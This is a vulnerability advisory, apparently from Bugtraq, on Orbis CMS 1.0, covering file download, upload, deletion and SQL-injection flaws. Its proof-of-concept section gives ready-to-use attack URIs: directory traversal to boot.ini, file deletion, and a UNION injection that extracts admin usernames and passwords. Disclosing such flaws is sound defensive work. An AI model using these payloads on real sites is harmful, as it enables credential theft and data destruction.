Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
BID:43312
Info
Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 43312 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2009 12:00AM |
| Updated: | Jul 30 2009 12:00AM |
| Credit: | SirGod |
| Vulnerable: |
Novo Web Solutions Orbis CMS 1.0 |
| Not Vulnerable: | |
Discussion
Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
Orbis CMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-download vulnerability, an arbitrary-file-upload vulnerability, an arbitrary-file-deletion vulnerability, and an SQL-injection vulnerability. These vulnerabilities occur because the application fails to properly sanitize user-supplied input.
Exploiting these vulnerabilities may allow an attacker to view, upload, or delete arbitrary files within the context of the application and access or modify data, or exploit latent vulnerabilities in the underlying database. Information harvested may aid in launching further attacks.
Novo Web Solutions Orbis CMS 1.0 is vulnerable; other versions may also be affected.
Orbis CMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-download vulnerability, an arbitrary-file-upload vulnerability, an arbitrary-file-deletion vulnerability, and an SQL-injection vulnerability. These vulnerabilities occur because the application fails to properly sanitize user-supplied input.
Exploiting these vulnerabilities may allow an attacker to view, upload, or delete arbitrary files within the context of the application and access or modify data, or exploit latent vulnerabilities in the underlying database. Information harvested may aid in launching further attacks.
Novo Web Solutions Orbis CMS 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini
http://www.example.com/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg
http://www.example.com/[path]/admin/editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/[path]/admin/fileman_file_download.php?fn=../../../../../../../boot.ini
http://www.example.com/[path]/admin/fileman_file_delete.php?fn=../uploads/example.jpg
http://www.example.com/[path]/admin/editor.php?s=null+union+all+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+security+where+user_id=1--&t=1
Solution / Fix
Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Novo Web Solutions Orbis CMS Multiple Input Validation Vulnerabilities
References:
References:
- Orbis CMS Homepage (Novo Web Solutions)